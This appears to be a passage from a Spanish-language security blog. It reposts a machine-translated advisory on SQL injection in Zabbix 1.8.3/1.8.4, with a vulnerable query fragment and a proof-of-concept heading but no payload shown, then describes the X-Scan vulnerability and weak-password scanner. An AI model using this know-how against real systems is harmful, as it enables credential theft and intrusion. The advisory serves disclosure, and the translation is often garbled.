'De los anfitriones.
    
'Dónde'. DBin_node ('hostid', $ nodeid).
    
"Y la situación en('. HOST_STATUS_PROXY_ACTIVE .','. HOST_STATUS_PROXY_PASSIVE .')'.
    
'ORDER BY anfitrión, hostid;$ Result = DBselect ($ sql);

 
V. PRUEBA DE CONCEPTO-------------------------
 
A continuación se presenta una solicitud de PoC que recupera todos los nombres de usuario y hash MD5 de la contraseñazabbix en base de datos MySQL:



 
VI. Impacto en el Negocio-------------------------Un atacante podría aprovechar esta vulnerabilidad para recuperar los datos debases de datos accesibles por el usuario zabbix db.En el caso de zabbix se le ha dado una cuenta de mysql más privilegiados de laexplotación puede ir tan lejos como la ejecución de código.
 
Una observación importante se refiere al hecho de que la versión 1.8.4 de zabbixsoftware web es la versión actual instalado por el comando apt-geten debian linux distros.
 
VII. SISTEMAS AFECTADOS-------------------------Las versiones 1.8.3 y 1.8.4 son vulnerables.
 
VIII. SOLUCIÓN-------------------------Actualizar a la versión 1.8.9 que acaba de salir.
 
IX. Referencias-------------------------http://www.zabbix.comhttps://support.zabbix.com/browse/ZBX-4385http://www.securityfocus.com/bid/50803/info
 
X. CREDITOS-------------------------La vulnerabilidad ha sido descubierta por Marcio Almeidamarcio (a) alligatorteam (dot) org@ Marcioalmwww.alligatorteam.org
 
XI. AGRADECIMIENTOS-------------------------Para Heyder Andrade para el desarrollo de los Buitres.Para el equipo de seguridad de cocodrilo.
 
XII. AVISOS LEGALES-------------------------La información contenida en este documento informativo se suministra "tal cual", conninguna garantía de aptitud de uso o de otra manera. No aceptoresponsabilidad por los daños causados ​​por el uso o mal uso de estede la información.

Fuente:http://www.exploit-db.com/exploits/18155/
Traduccion:Dellcom1@.

Saludos Mundo Libre.

miércoles, 23 de noviembre de 2011

X-Scan

Saludos Mundo Libre.

X-Scan es un escáner para la digitalización general de vulnerabilidades de la red para el ámbito específico de direcciones IP o equipo independiente de multi-threading método, plug-ins son sostenibles. X-Scan, que disponen de incluir en los siguientes: tipo de servicio, tipo de sistema operativo remoto y detección de la versión, par débil de usuario / contraseña, y todos los scripts de ataque nessus combinación.

Es compatible con Nessus plugins NASL para el escaneo de vulnerabilidades - que hace que sea muy útil. También tiene tanto gráficas como de la versión de línea de comandos para scripting.

Los siguientes artículos pueden ser examinados:

     Remota del sistema operativo tipo y la detección de versiones
     Estado de los puertos estándar y la información de la bandera,
     Información SNMP,
     CGI detección de la vulnerabilidad,
     IIS vulnerabilidad de detección,
     RPC vulnerabilidad de detección,
     Detección de la vulnerabilidad SSL,
     SQL-Server,
     Servidor FTP,
     SMTP-servidor,
     POP3 y el servidor,
     NT-servidor débil de usuario / contraseña pares de módulos de autenticación,
     NT servidor NETBIOS información,
     Registro de información a distancia, etc

Los resultados del análisis se guardan en / Directorio de registro, y se index_ip_address.htm título (si se utiliza la interfaz gráfica de usuario) o dirección_ip si utiliza la opción de línea de comandos. Estos pueden ser directamente navegado por cualquier navegador web normal.

Básica de usuario y contraseña se suministran listas para llevar a cabo un atentado grave a determinados servicios, (arriba), si se encuentra habilitado en el host.



Descarga del Programa: http://www.xfocus.org/index.html

Fuente: http://www.xfocus.org/index.html

Traduccion: Dellcom1@.

Saludos Mundo Libre.